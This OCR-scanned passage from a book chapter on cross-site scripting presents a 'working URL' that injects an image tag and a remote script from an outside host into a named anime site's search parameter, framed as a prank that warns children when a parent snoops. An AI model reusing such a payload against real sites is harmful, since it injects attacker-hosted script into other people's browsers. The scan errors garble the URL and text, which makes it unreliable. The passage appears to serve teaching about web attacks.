
XSS Exploited 9 Chapter 6 277
The following represents a working URL to launch this attack (at time of writing)"
ht tp : //www. animenf o. com/search, php ? query=" > < img
src=ht tp 9 / / thekidswebs ite. corn/img, php ? s it e=animenf o ><script
src=http-//www, thekidswebsite, com/xss/s, j s>b+%22&queryin=anime_titles&action=Go&opt
ion=keywords
Figure 6.31 Snoopwned
As you can see in Figure 6.31, the curious parent will see the URL
animenfo.com
and if
they click on it, will instantly inform their kids of the spying and also end up being redi-
rected to
animalinfo.com.
Granted, if a kid could do ...